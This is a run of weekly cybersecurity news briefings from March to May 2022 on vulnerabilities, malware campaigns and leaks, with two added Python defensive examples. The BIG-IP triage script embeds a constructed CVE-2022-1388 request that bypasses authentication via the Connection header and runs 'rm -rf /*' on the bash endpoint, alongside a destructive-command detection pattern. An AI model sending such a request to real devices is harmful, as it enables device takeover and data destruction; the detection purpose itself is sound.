The actively exploited 0-day, tracked as CVE-2022-26925, is a spoofing vulnerability in Windows LSA that an unauthenticated attacker could exploit by calling a method on the LSARPC interface and coercing the domain controller to authenticate to the attacker via the NT LAN Manager (NTLM) protocol. According to its discoverer, security researcher Raphael John, the flaw is being exploited in the wild and appears to be a new attack vector for PetitPotam, the NTLM relay attack discovered in July 2021. The other two 0-days are a denial-of-service vulnerability in Windows Hyper-V (CVE-2022-22713) and a flaw in the Magnitude Simba Amazon Redshift ODBC driver (CVE-2022-29972, also known as SynLapse). Microsoft recommends applying the security updates as soon as possible.

More info: https://msrc.microsoft.com/update-guide/releaseNote/2022-May

* * *

CNPIC warns of a possible cyber-attack on critical infrastructures

Spain's National Centre for the Protection of Critical Infrastructure and Cybersecurity (CNPIC) has sent a security warning to companies classed as critical infrastructure in the country, alerting them to the risk of a possible cyber-attack on companies in critical sectors such as energy, communications and finance, among others. The alert implies that companies should step up precautions and protective measures within their IT infrastructure so that they can deal with a possible cyber-attack pre-emptively and avoid a disruption of services. The specific type of threat behind the possible cyber-attack, as well as its attribution, is not known at this stage, although the aim appears to be the disruption of strategic services.
More info: https://www.lainformacion.com/empresas/alerta-maxima-en-las-infraestructuras-espanolas-por-riesgo-de-ciberataques/2866557/

* * *

Database with nearly 21 million VPN users exposed

Researchers at vpnMentor have reported the leak on Telegram of a Cassandra database containing 21 million unique records of VPN service users. The file, initially traded on the dark web in 2021, was reportedly shared for free via the messaging app from 7 May. The 10 GB of information includes user data from the free VPN services GeckoVPN, SuperVPN and ChatVPN. The exposed data reportedly includes usernames, email addresses, full names, countries, billing details, randomly generated password strings and account validity periods. The researchers who analysed the database emphasised two things: that 99.5 per cent of the accounts were Gmail addresses, suggesting that this database may be only a fragment of the compromised data; and that the password fields contained hashes, salts or random strings, suggesting that each is different and making them harder to crack.

More info: https://www.vpnmentor.com/blog/vpns-leaked-on-telegram/

* * *

New Nerbian RAT distribution campaign

Researchers at Proofpoint have detailed a distribution campaign for a malware they have named Nerbian RAT (Remote Access Trojan), after a reference in one of the malware's functions to Nerbia, a fictional place in Don Quixote. It is a new RAT written in Go, a language increasingly used for malware development, with multiple libraries and components aimed at evading detection. In the observed campaign, the World Health Organization (WHO) is impersonated in malspam emails containing purported COVID-19 information. The emails carry an attached Word document; enabling its macros triggers the download of a .bat file, which runs a PowerShell command to connect to the command and control server.
As a result, the executable that acts as a dropper for Nerbian RAT is finally downloaded. The campaign has reportedly been active since 26 April and is said to have been directed primarily against entities in Italy, Spain and the UK.

More info: https://www.proofpoint.com/us/blog/threat-insight/nerbian-rat-using-covid-19-themes-features-sophisticated-evasion-techniques
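As an added example for the BIG-IP item in this briefing (not F5's, Horizon3's or SANS's code): a parser for raw HTTP requests to the iControl REST API that flags the traits of CVE-2022-1388 exploitation, namely a Connection header that names X-F5-Auth-Token so that the front end strips the token before the request reaches the REST back end, a Basic credential presented with a localhost Host header, and a command sent to the /mgmt/tam/util/bash endpoint, and that separately marks a destructive command such as the rm -rf /* described above. The two requests and the token value are constructed samples.

```python
"""Triage raw HTTP requests for CVE-2022-1388 (BIG-IP iControl REST) traits.

Added example, not vendor or researcher code. Requests below are constructed.
"""
import base64
import json
import re

# Commands that would wipe the box rather than plant a webshell.
DESTRUCTIVE_RE = re.compile(r"\brm\s+-[a-z]*r[a-z]*\s+/|\bmkfs\b", re.IGNORECASE)


def parse_request(raw):
    """Split a raw request into (method, path, headers, body); header names lower-cased."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, path, _ = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def assess(raw):
    """Return reasons this request looks like CVE-2022-1388 abuse (empty = clean)."""
    method, path, headers, body = parse_request(raw)
    reasons = []
    if not path.startswith("/mgmt/"):
        return reasons
    if "x-f5-auth-token" in headers.get("connection", "").lower():
        reasons.append("Connection header lists X-F5-Auth-Token (hop-by-hop header abuse)")
    host = headers.get("host", "").split(":")[0].lower()
    if host in ("localhost", "127.0.0.1") and headers.get("authorization", "").lower().startswith("basic "):
        reasons.append(f"Basic credential with Host {host}")
    if path.startswith("/mgmt/tam/util/bash"):
        try:
            command = json.loads(body).get("utilCmdArgs", "")
        except (ValueError, AttributeError):
            command = ""
        if command:
            reasons.append(f"bash endpoint command: {command}")
            if DESTRUCTIVE_RE.search(command):
                reasons.append("destructive command (device wipe)")
    return reasons


# Constructed exploit-style request: the token header is dropped by the front
# end because Connection names it, and the request then passes as a local
# admin call even though the Basic credential was never valid.
EXPLOIT_REQUEST = (
    "POST /mgmt/tam/util/bash HTTP/1.1\r\n"
    "Host: 127.0.0.1\r\n"
    "Connection: keep-alive, X-F5-Auth-Token\r\n"
    "X-F5-Auth-Token: a\r\n"
    "Authorization: Basic " + base64.b64encode(b"admin:").decode() + "\r\n"
    "Content-Type: application/json\r\n"
    "\r\n"
    '{"command": "run", "utilCmdArgs": "-c \'rm -rf /*\'"}'
)

# Constructed routine request from an admin host carrying a real session token.
BENIGN_REQUEST = (
    "GET /mgmt/tm/sys/version HTTP/1.1\r\n"
    "Host: bigip01.corp.example\r\n"
    "Connection: keep-alive\r\n"
    "X-F5-Auth-Token: 2QZX4E5J7QHPRAH6RCDK3WN5MJ\r\n"
    "\r\n"
)

if __name__ == "__main__":
    for label, raw in (("exploit", EXPLOIT_REQUEST), ("benign", BENIGN_REQUEST)):
        print(label, assess(raw) or ["no findings"])
```

This is meant for request captures or the logs of a reverse proxy placed in front of the management interface, which is where these requests are visible in the clear. It complements rather than replaces F5's mitigations: upgrading, and until then blocking iControl REST access through self IPs and restricting the management interface to trusted networks, which removes the attacker's path to the endpoint altogether.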
May 13, 2022
Cyber Security
Cyber Security Weekly Briefing, 24 April – 6 May
TLStorm 2 - Vulnerabilities in Aruba and Avaya switches

Researchers at Armis have discovered five vulnerabilities in the implementation of TLS communications in multiple models of Aruba and Avaya switches. The vulnerabilities stem from a design flaw similar to the TLStorm vulnerabilities, also discovered by Armis earlier this year, and could allow a malicious actor to execute code remotely on the devices, potentially affecting millions of enterprise network infrastructure devices. The root cause is that the vendors' code does not follow the NanoSSL library's guidelines. In Aruba this leads to two overflows, tracked as CVE-2022-23677 and CVE-2022-23676 with CVSS scores of 9.0 and 9.1 respectively. In Avaya, the library integration has three flaws: a TLS reassembly overflow (CVE-2022-29860, CVSS 9.8), an HTTP header parsing overflow (CVE-2022-29861, CVSS 9.8) and an HTTP POST request handling overflow with no CVE assigned. Successful exploitation could lead to anything from information leakage and complete device takeover to lateral movement and bypass of network segmentation defences. Armis stresses that the network infrastructure itself is at risk and exploitable by attackers, meaning that network segmentation can no longer be considered a sufficient security measure on its own.

URL: https://www.armis.com/blog/tlstorm-2-nanossl-tls-library-misuse-leads-to-vulnerabilities-in-common-switches/

* * *

Millions of IoT devices affected by serious DNS flaw

The Nozomi Networks Labs team has discovered an unpatched vulnerability in the domain name system (DNS) implementation of multiple routers and IoT devices deployed across various critical infrastructure sectors.
The flaw lies in two C libraries (uClibc and uClibc-ng) commonly used in IoT products, employed by Linux distributions such as Embedded Gentoo and widely used by major vendors such as Netgear, Axis and Linksys. According to the research, a threat actor could use DNS poisoning or DNS spoofing to redirect network traffic to a server under their control and thereby steal or manipulate information transmitted by users, and carry out further attacks against the devices to compromise them completely. Nozomi estimates that more than 200 vendors could be affected by the vulnerability, which has no CVE identifier as yet; since no patch is available, specific technical details of its exploitation have been withheld until new firmware versions fixing the issue are available.

URL: https://www.nozominetworks.com/blog/nozomi-networks-discovers-unpatched-DNS-bug-in-popular-c-standard-library-putting-iot-at-risk/

* * *

Severe vulnerabilities in Avast and AVG

The SentinelOne team discovered in December 2021 two critical vulnerabilities, tracked as CVE-2022-26522 and CVE-2022-26523, in Avast and AVG antivirus products. The vulnerabilities had reportedly been present in the products since 2012 and affected the "Anti Rootkit" driver in both products. The flaws allowed malicious actors to abuse the socket connection to the kernel driver to escalate privileges and disable the security products, making it possible to overwrite system components, corrupt the operating system and/or perform malicious operations unhindered, such as injecting code, moving laterally or installing backdoors. Both vulnerabilities were patched in version 22.1 of Avast antivirus (AVG was acquired by Avast in 2016), released on 8 February. Despite the length of time the vulnerabilities have existed, no signs of exploitation have been detected.
URL: https://www.sentinelone.com/labs/vulnerabilities-in-avast-and-avg-put-millions-at-risk/

* * *

Vulnerability in several ransomware families could prevent data encryption

Security researcher John Page (hyp3rlinx) has shown that several recently active ransomware families are vulnerable to a DLL hijacking flaw that can prevent their ultimate purpose, the encryption of their victims' data. Details of the research have been published through the Malvuln project, created by the researcher himself, which catalogues vulnerabilities found in malware samples. DLL hijacking is a type of vulnerability generally used for arbitrary code execution and privilege escalation. In this case, by placing a specially crafted DLL with the name of a DLL the malware loads, the ransomware process is intercepted and terminated, preventing data encryption. For the time being, Malvuln has published proofs of concept (PoCs) for the Conti, REvil, Loki Locker, Black Basta, AvosLocker, LockBit and WannaCry ransomware families, without ruling out that the flaw is exploitable in other ransomware as well.

URL: https://www.malvuln.com/
May 6, 2022
Cyber Security
Cyber Security Weekly Briefing 22–29 April
New malicious RedLine distribution campaign

Researchers at Bitdefender have published a report on a new RedLine malware distribution campaign. According to the analysts, the operators are using the RIG Exploit Kit for distribution, which exploits an Internet Explorer vulnerability that causes memory corruption when the victim visits a specially crafted website. The flaw, tracked as CVE-2021-26411 with a CVSSv3 score of 7.8, was patched by Microsoft in March 2021. After exploiting the vulnerability, the kit delivers RedLine by dropping a JavaScript file in a temporary directory, which in turn downloads a second, RC4-encrypted payload that carries out the final infection of the victim's computer. According to The Record, Bogdan Botezatu, director of research at Bitdefender, said that in April they identified 10,000 RedLine attacks worldwide with their solutions alone, which shows how widely this malware is used in security incidents.

Read more: https://media.telefonicatech.com/telefonicatech/uploads/2021/1/154425_Bitdefender-PR-Whitepaper-RedLine-creat6109-en-EN.pdf

Privilege escalation in Windows Active Directory

Security firm SOC Prime has published an article stating that security researchers have revealed a flaw in Windows Active Directory (AD) environments running with default settings. The flaw, which allows a user who can add machines to the domain to do so without administrator privileges, could lead to privilege escalation on the vulnerable system. A proof of concept exists, and the flaw can be exploited using the KrbRelayUp tool. A possible mitigation is to change the default configuration by removing Authenticated Users from the "Add workstations to domain" right in the Default Domain Controllers Policy. More details on mitigating the vulnerability can be found in Mor Davidovich's research repository.
Nimbuspwn: privilege escalation vulnerabilities in Linux

Microsoft researchers have identified two new vulnerabilities, collectively called Nimbuspwn, that could allow an attacker to escalate privileges to root on vulnerable Linux systems. The flaws, tracked as CVE-2022-29799 and CVE-2022-29800, are in the networkd-dispatcher component, which dispatches scripts in response to changes in network interface state. According to the researchers, chaining the vulnerabilities would allow malicious actors to obtain root privileges and, at later stages, deploy payloads, backdoors and malware and/or perform other malicious actions through arbitrary code execution. Clayton Craft, the maintainer of networkd-dispatcher, has released fixes, and users are advised to update their installations to prevent possible attacks.

Read more: https://www.microsoft.com/security/blog/2022/04/26/microsoft-finds-new-elevation-of-privilege-linux-vulnerability-nimbuspwn/
April 29, 2022
Cyber Security
Cyber Security Weekly Briefing 16–22 April
Fodcha: new DDoS botnet
360netlab and CNCERT researchers have discovered a new botnet focused on conducting denial-of-service attacks, which is spreading rapidly on the Internet. The botnet has been named Fodcha because its first C2 was in the folded[.]in domain and because it uses the ChaCha algorithm to encrypt network traffic. It spreads by exploiting n-day vulnerabilities in Android products, GitLab, the Realtek Jungle SDK, Zhone routers and Totolink routers, among others, as well as by compromising weak Telnet/SSH passwords with the brute-force tool Crazyfia. Fodcha's activity began in January, with a significant increase in attacks on 1 March, and activity reportedly intensified from the end of March. In fact, around 19 March there was a change in the botnet's versions which, according to the researchers, was due to the shutdown of the old servers by the cloud providers.
Read more: https://blog.netlab.360.com/fodcha-a-new-ddos-botnet/

INCONTROLLER/PIPEDREAM new malware targeting ICS/SCADA environments
A new malware targeting industrial control systems (ICS) and supervisory control and data acquisition (SCADA) systems has recently been discovered. This malware could lead to system outages, degradation or even destruction. Mandiant researchers have labelled it INCONTROLLER, while Dragos' team has named it PIPEDREAM, noting that it was developed by the threat actor CHERNOVITE. The malware stands out for carrying a set of tools to attack its victims' systems, and it does not exploit a specific vulnerability but rather takes advantage of native functionality of the affected ICS systems, which is why both the researchers and several US security agencies (CISA, the FBI and the CSA) have published a series of measures for detection and protection. It is worth noting that, while investigations have found that the malware could target different manufacturers, it contains modules specifically developed for Schneider Electric and Omron programmable logic controllers (PLCs).
Read more: https://media.telefonicatech.com/telefonicatech/uploads/2021/1/154019_Dragos_ChernoviteWP_v2b.pdf

HOMAGE: zero-click vulnerability in iOS used in espionage campaign
The Citizen Lab team has published an investigation detailing an espionage campaign carried out between 2017 and 2020, which they have named Catalangate and which involved the exploitation of several vulnerabilities in iOS. The most relevant is the use of a new exploit for a zero-click vulnerability in iOS, used to infect devices with spyware belonging to NSO Group. This vulnerability, named HOMAGE, affected an iMessage component and iOS versions prior to 13.1.3 and was fixed in iOS 13.2 (it should be noted that the latest stable version of iOS is 15.4). The researchers have also detected the use of other vulnerabilities: another zero-click vulnerability discovered in 2020 and called KISMET, which affected iOS versions 13.5.1 and 13.7, as well as an already patched vulnerability in WhatsApp, CVE-2019-3568. As a result of this investigation, at least 65 people have been found to have been infected with the Pegasus and Candiru spyware.
Read more: https://citizenlab.ca/2022/04/catalangate-extensive-mercenary-spyware-operation-against-catalans-using-pegasus-candiru/

Vulnerabilities in ALAC audio encoding format
Researchers at Check Point have announced several vulnerabilities in the Apple Lossless Audio Codec (ALAC), also known as Apple Lossless, an audio encoding format. Exploitation of the discovered flaws could allow an attacker to remotely execute code on a vulnerable device by tricking the user into opening a manipulated audio file, an attack they have named ALHACK. ALAC was initially developed by Apple, which made it open source in late 2011; since then it has been incorporated into a multitude of devices and software. Since its release, Apple has updated its proprietary version several times, but the shared code has not been patched since. It is therefore to be assumed that all third-party vendors using the initial code provided by Apple in 2011 have a vulnerable version. According to the researchers, this is exactly what happened with Qualcomm and MediaTek, which are said to have incorporated the vulnerable code in the audio decoders used by more than half of today's smartphones. The disclosure was handled responsibly: before making its discovery public, Check Point alerted MediaTek and Qualcomm, and both firms fixed the vulnerabilities in December 2021 (CVE-2021-0674 and CVE-2021-0675 in the case of MediaTek and CVE-2021-30351 in the case of Qualcomm). Technical details of the vulnerability will be made public in May at the CanSecWest conference.
Read more: https://blog.checkpoint.com/2022/04/21/largest-mobile-chipset-manufacturers-used-vulnerable-audio-decoder-2-3-of-android-users-privacy-around-the-world-were-at-risk/
April 22, 2022
Cyber Security
Cyber Security Weekly Briefing 1–8 April
Critical vulnerability in GitLab allows access to user accounts
GitLab has released a security update that fixes a total of 17 vulnerabilities, including a critical vulnerability affecting both GitLab Community Edition (CE) and Enterprise Edition (EE). This security flaw, CVE-2022-1162, rated with a CVSS of 9.1, resides in the way an encrypted password is set for accounts registered with an OmniAuth provider, allowing malicious actors to take control of those accounts using these passwords. So far, no evidence has been detected of any accounts being compromised through this flaw. However, GitLab has published a script to help identify which user accounts are affected and recommends updating all GitLab installations to the latest versions (14.9.2, 14.8.5 or 14.7.7) as soon as possible to prevent possible attacks.
Read more: https://about.gitlab.com/releases/2022/03/31/critical-security-release-gitlab-14-9-2-released/#script-to-identify-users-potentially-impacted-by-cve-2022-1162

New Deep Panda techniques: Log4Shell and digitally signed Fire Chili rootkits
Fortinet researchers have identified that the APT group Deep Panda is exploiting the Log4Shell vulnerability in VMware Horizon servers to deploy a backdoor and a new rootkit on infected machines. The group's goal is to steal information from victims in the financial, academic, cosmetics and travel industries. The researchers show that the infection chain exploited the Log4j remote code execution flaw on vulnerable VMware Horizon servers to run a series of intermediate stages and, finally, to deploy the backdoor called Milestone, which is also designed to send information about current sessions on the system to the remote server. A kernel rootkit called Fire Chili has also been detected, digitally signed with certificates stolen from game development companies, which allows it to evade detection and to hide malicious file operations, processes, registry key additions and network connections. The researchers have also attributed the use of Fire Chili to the group known as Winnti, indicating that the developers of these threats may have shared resources such as stolen certificates and Command & Control (C2) infrastructure.
Read more: https://www.fortinet.com/blog/threat-research/deep-panda-log4shell-fire-chili-rootkits

Phishing campaign exploits supposed WhatsApp voicemail messages
Researchers at Armorblox have reported a phishing campaign that uses voice messages from the WhatsApp messaging platform as a lure to deploy malware on victims' devices. According to the investigation, the attack starts with the distribution of phishing emails pretending to be a WhatsApp notification about a "private message" audio, for which the malicious actors include a "Play" button embedded in the body of the email along with the length of the audio and its creation date. As soon as the target user clicks "Play", they are redirected to a website showing an allow/block prompt that, through social engineering, eventually installs the JS/Kryptik trojan and the payload needed to deploy a stealer-type malware. Armorblox stresses that the malicious emails are sent from legitimate accounts that have previously been compromised, which makes it very difficult for the security tools active on the target machine to detect them. The ultimate goal of the campaign is mainly the theft of credentials stored in browsers and applications, as well as cryptocurrency wallets, SSH keys and even files stored on the victims' computers.
Read more: https://www.bleepingcomputer.com/news/security/whatsapp-voice-message-phishing-emails-push-info-stealing-malware/

Cicada: new espionage campaign
Symantec researchers have published research on a sophisticated, long-term espionage campaign by the cybercriminal group Cicada (aka APT10). According to the experts, the campaign is said to have been active from mid-2021 to February this year, with operations targeting government entities and NGOs in Asia, America and Europe, although other sectors such as telecommunications, legal entities and pharmaceuticals have also been affected. The entry vector is believed to be the exploitation of a known but unspecified vulnerability in unpatched Microsoft Exchange servers. After the initial compromise, Cicada deploys tools such as the Sodamaster backdoor (a tool associated with this actor that has enabled attribution), a custom loader that abuses the legitimate VLC player with a malicious DLL using the DLL side-loading technique, Mimikatz to obtain credentials, WinVNC for remote control and WMIExec for command execution.
Read more: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/cicada-apt10-china-ngo-government-attacks

New critical vulnerabilities in VMware
VMware released a bulletin fixing critical, high and medium severity vulnerabilities in its VMware Workspace ONE Access (Access), VMware Identity Manager (vIDM), VMware vRealize Automation (vRA), VMware Cloud Foundation and vRealize Suite Lifecycle Manager products. The most critical vulnerabilities are the following:
CVE-2022-22954 (CVSSv3 9.8): server-side template injection vulnerability that can lead to remote code execution.
CVE-2022-22955/22956 (CVSSv3 9.8): vulnerabilities that allow bypassing authentication in the OAuth2 ACS framework.
CVE-2022-22957/22958 (CVSSv3 9.1): remote code execution vulnerabilities via a malicious JDBC URI, requiring administrator access.
Other vulnerabilities of high criticality (CVE-2022-22959, CVSSv3 8.8, and CVE-2022-22960, CVSSv3 7.8) and medium criticality (CVE-2022-22961, CVSSv3 5.3) have also been fixed. According to the company, there is no evidence that any of these vulnerabilities are being actively exploited. Additionally, VMware has published several steps that users can take to mitigate the impact of these vulnerabilities in cases where upgrading the software is not possible.
Read more: https://www.vmware.com/security/advisories/VMSA-2022-0011.html
April 8, 2022
Cyber Security
Cyber Security Weekly Briefing 26 March- 1 April
Spring4Shell vulnerability
Spring has released security updates for the 0-day remote code execution (RCE) flaw known as Spring4Shell. Since the vulnerability first appeared, unconfirmed information has been released by different researchers and media. Spring has now published specific details of the vulnerability, assigned it a CVE and published the patches that fix the bug. The vulnerability has been identified as CVE-2022-22965 and, although its CVSS score is unknown for the moment, it is of critical severity. While the flaw can be exploited in multiple ways, Spring developers have stated that exploitation requires JDK version 9 or higher, Apache Tomcat as the Servlet container, WAR packaging and dependencies on the spring-webmvc or spring-webflux frameworks. Vulnerable versions have been confirmed, so it is recommended to upgrade to Spring Framework 5.3.18 or 5.2.20 or higher, and Spring Boot to versions 2.6.6 or 2.5.12 or higher. Spring has also published a series of mitigations for those who are unable to deploy the updates.
More info: https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement

Phishing campaign impersonating Spanish organizations
The Spanish Internet Security Office (Oficina de Seguridad del Internauta, OSI) has alerted about a phishing campaign impersonating the Spanish Tax Agency. The emails were sent from a spoofed address displaying the domain @hacienda.hob.es, with the subject line "Comprobante fiscal digital - MINISTERIO DE HACIENDA Y FUCION PUBLICA". These emails urge victims to download an alleged .zip file containing documentation to be submitted to the public body, which in reality contains malware. The OSI states that the impersonation of other government bodies within the same campaign cannot be ruled out, with corresponding changes to the subject and sender of the emails. The Digital Risk Protection Service has also been able to analyze this campaign, detecting the impersonation of the Ministry of Health and the Ministry of Finance and identifying the distributed malware as the banking Trojan Mekotio.
All details: https://www.osi.es/es/actualidad/avisos/2022/03/phishing-suplantando-la-agencia-tributaria-con-riesgo-de-infeccion-por

Apple fixes actively exploited 0-day vulnerabilities
Apple has released security updates fixing two new 0-day vulnerabilities that are reportedly being actively exploited and that affect its iPhone, iPad and Mac products. The first of the flaws, CVE-2022-22674, is an out-of-bounds write vulnerability in the graphics driver for Intel which, if exploited, could allow disclosure of kernel memory information. The second bug, CVE-2022-22675, is also an out-of-bounds write vulnerability, in this case in the AppleAVD component. Affected products include macOS Monterey, iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation). Both bugs have been resolved in iOS 15.4.1, iPadOS 15.4.1 and macOS Monterey 12.3.1.
All info: https://support.apple.com/en-us/HT213220

New IcedID distribution campaign
Researchers from Intezer and Fortinet have analyzed a new campaign of the IcedID malware, a modular banking Trojan first detected in 2017 and commonly used in ransomware distribution. The campaign has been distributed via phishing emails sent from previously compromised legitimate email accounts, reusing existing conversation threads and carrying malicious attachments. The attachment has also changed: it is still a password-protected ZIP file, but instead of the usual Office documents it now contains an ISO image with a Windows LNK file and a DLL that executes the malware. The use of such files allows attackers to bypass Mark-of-the-Web controls and execute the malware without alerting the user. From the analysis of the compromised accounts, the researchers point to vulnerable Exchange servers publicly exposed to ProxyShell, suggesting that this may be the initial entry vector to the accounts used in the campaign. Activity has focused on organizations in the energy, healthcare, legal and pharmaceutical sectors. Finally, overlaps have been observed in some of the TTPs used, which associate this activity with the actors TA577 and TA551.
More info: https://www.intezer.com/blog/research/conversation-hijacking-campaign-delivering-icedid/

Large-scale fraud against the retail sector
Researchers from Segurança Informática have published an in-depth analysis of a fraud campaign against multiple brands in the retail sector, active since the end of 2020 and growing since the beginning of 2022. In this scheme, domains similar to the legitimate ones of the targeted brand are used to distribute phishing via malicious Google, Instagram or Facebook ads. All the malicious domains detected bear some similarity to the legitimate domains of the impersonated organizations, using typosquatting techniques combined with different TLDs, including ".shop", ".website" or ".online". Once victims clicked on the advertisements, they were redirected to the fraudulent page, where they found large discounts and offers and could place an online order and track the package. The victims' data was collected for future scams, and in some cases they were sent parcels full of waste. The operators used home-made content management system (CMS) templates published on GitHub in which, after changing a few images, they could clone any brand. The largest number of victims has been in Italy, Chile and Portugal, followed by other countries such as Spain and France. Through these operations, the attackers could have made a profit of more than one million euros to date.
More info: https://seguranca-informatica.pt/shopping-trap-the-online-stores-scam-that-hits-users-worldwide/
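As an added illustration of the lookalike-domain pattern described in the retail fraud item above (example code written for this page, not code from Segurança Informática or Telefónica Tech), the script below scores observed domains against a list of protected brand domains, flagging same-name registrations under another TLD, small edit-distance variants and labels that embed the brand. The brand list and the observed domains are constructed sample data, and handling only single-label public suffixes (".com", not ".co.uk") is an assumption of the example.

```python
"""Lookalike-domain detector for the retail fraud pattern described above.

Added example (not code from Segurança Informática or Telefónica Tech).
Brand domains and observed domains are constructed sample data; handling
only single-label public suffixes (".com", not ".co.uk") is an assumption.
"""

# Constructed: brands a defender wants to protect.
BRAND_DOMAINS = ["examplestore.com", "shopbrand.pt"]

# TLDs the report names as used by the fraudulent shops.
REPORTED_TLDS = {"shop", "website", "online"}

# Constructed: domains extracted from ad-network and DNS logs.
OBSERVED_DOMAINS = [
    "examplestore.com",            # the legitimate site itself
    "examplestore.shop",           # same name, TLD from the report
    "exmaplestore.online",         # transposed letters + reported TLD
    "example-store.website",       # inserted hyphen + reported TLD
    "examplestore-outlet.online",  # brand embedded in a longer label
    "shopbrand.com",               # same name, TLD not in the report
    "totallyunrelated.org",        # benign control
]


def split_domain(domain):
    """Return (registrable_label, tld) for 'sub.label.tld'-style names."""
    parts = domain.lower().strip(".").split(".")
    if len(parts) < 2:
        raise ValueError(f"not a registrable domain: {domain!r}")
    return parts[-2], parts[-1]


def edit_distance(a, b):
    """Damerau-Levenshtein distance: insert, delete, substitute or swap
    adjacent characters, each costing 1. Adjacent swaps matter because
    typosquats are often built from transposed letters."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1,         # deletion
                          d[i][j - 1] + 1,         # insertion
                          d[i - 1][j - 1] + cost)  # substitution
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)  # transposition
    return d[len(a)][len(b)]


def classify(domain, brands=BRAND_DOMAINS, max_distance=2):
    """Return (brand, reason) when `domain` looks like a lookalike of a
    protected brand, or None for the brand's own domain and unrelated names.
    max_distance=2 suits labels of 8+ characters; tighten it for short brands."""
    label, tld = split_domain(domain)
    for brand in brands:
        b_label, b_tld = split_domain(brand)
        if label == b_label and tld == b_tld:
            return None  # the brand's own domain
        if label == b_label:
            return brand, f"same name under .{tld}"
        distance = edit_distance(label, b_label)
        if distance <= max_distance:
            return brand, f"edit distance {distance} from {b_label}"
        if b_label in label:
            return brand, f"{b_label} embedded in label"
    return None


def scan(domains, brands=BRAND_DOMAINS):
    """Classify every observed domain; mark the TLDs named in the report so
    an analyst can triage those first."""
    findings = []
    for domain in domains:
        hit = classify(domain, brands)
        if hit is None:
            continue
        brand, reason = hit
        findings.append({
            "domain": domain,
            "brand": brand,
            "reason": reason,
            "reported_tld": split_domain(domain)[1] in REPORTED_TLDS,
        })
    return findings


if __name__ == "__main__":
    for f in scan(OBSERVED_DOMAINS):
        flag = "!" if f["reported_tld"] else " "
        print(f"{flag} {f['domain']:<28} -> {f['brand']:<18} {f['reason']}")
```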
April 1, 2022
Cyber Security
Cyber Security Weekly Briefing 19-25 March
Privilege escalation vulnerability in Western Digital
Independent security researcher Xavier Danest has reported a privilege escalation vulnerability in EdgeRover, software developed by storage products manufacturer Western Digital for content management that unifies multiple storage devices under a single interface. Identified as CVE-2022-22988, the vulnerability has been rated critical with a CVSSv3 of 9.1 because, due to a directory traversal flaw, it would allow an attacker who has previously compromised the target system to gain unauthorised access to restricted directories and files. This could additionally lead to local privilege escalation, disclosure of confidential information or denial of service (DoS). The flaw affects the desktop versions of EdgeRover for Windows and Mac, and it is currently unknown whether it is being actively exploited in the wild. Western Digital has already fixed file and directory permissions to prevent unauthorised access and modification and recommends upgrading EdgeRover to version 1.5.1-594 or later, which addresses this vulnerability.
For more: https://www.westerndigital.com/support/product-security/wdc-22004-edgerover-desktop-app-version-1-5-1-594

Serpent: new backdoor targeting French organisations
Researchers at Proofpoint have discovered a new backdoor targeting French organisations in the construction and government sectors. The detected campaign uses macro-enabled Microsoft Word documents, disguised as GDPR-related information, to distribute Chocolatey, a legitimate open-source package installer which, after various stealth techniques such as steganography and a scheduled-task bypass, would deploy the backdoor that Proofpoint has named "Serpent". Once the infection chain is successfully completed, the attacker would be able to manage the target host from its Command & Control (C2) server, exfiltrate sensitive information or even distribute additional payloads. Proofpoint highlights the possibility that Serpent is an advanced, targeted threat, based on unusual behaviours such as steganography, although there is currently no evidence to attribute it to any specific known group.
All the details: https://www.proofpoint.com/us/blog/threat-insight/serpent-no-swiping-new-backdoor-targets-french-entities-unique-attack-chain

Critical vulnerabilities in HP printer models
HP has recently published two security bulletins reporting critical vulnerabilities affecting hundreds of the company's LaserJet Pro, PageWide Pro, OfficeJet, Enterprise, Large Format and DeskJet printer models. On 21 March HP published a security advisory (HPSBPI03780) identifying a security flaw catalogued as CVE-2022-3942 (CVSS 8.4), a buffer overflow that could lead to remote code execution. The second bulletin (HPSBPI03781) covers three other vulnerabilities, two of which are classified as critical: CVE-2022-24292 and CVE-2022-24293 (CVSS 9.8). Exploitation of these vulnerabilities could allow malicious actors to cause information disclosure, remote code execution or denial of service. All of these security flaws were discovered by Trend Micro's Zero Day Initiative team. It should be noted that HP has released firmware security updates for most of the affected products, although not all models are patched yet.
Discover more: https://support.hp.com/us-en/document/ish_5948778-5949142-16/hpsbpi03780

Spying campaign using new variant of Korplug malware
ESET security researchers have detected a malicious campaign that has been active for at least eight months and is distributing a new variant of the Korplug remote access trojan (RAT). According to the investigation, the malware is distributed by emails using lures tied to current events such as COVID-19 or to European institutional themes. Among the targets detected, ESET mentions European diplomats, internet service providers and research institutes in countries such as Greece, Cyprus and South Africa, among others. Korplug is a trojan previously associated with variants of the PlugX malware that, depending on the campaign or threat actor using it, can enumerate drives and directories, read and write files, execute commands on a hidden desktop, initiate remote sessions and communicate with the attackers' Command & Control (C2) server. However, we do not rule out the possibility that Korplug is still in development, adding new stealth functionality. ESET attributes this campaign to the China-linked threat actor Mustang Panda (aka TA416), known to be primarily motivated by political espionage.
More: https://www.welivesecurity.com/2022/03/23/mustang-panda-hodur-old-tricks-new-korplug-variant/

New North Korean APT campaigns exploiting 0-day Chrome vulnerabilities
Google researchers have identified new campaigns attributed to two North Korea-linked groups that exploited remote code execution vulnerabilities in Chrome. The activity of these groups has previously been referred to as Operation Dream Job and Operation AppleJeus respectively. These APTs are said to have exploited the vulnerability CVE-2022-0609 for just over a month before the patch was made available on 14 February. The activity is said to have targeted US entities, including media outlets and organisations in the technology, cryptocurrency and financial technology sectors, although other sectors and geographies may also have been targeted. The published analysis details the tactics, techniques and procedures (TTPs), indicators of compromise and details of the exploit used by the attackers, which could be reused by other groups linked to North Korea.
All of the details: https://blog.google/threat-analysis-group/countering-threats-north-korea/
March 25, 2022
Cyber Security
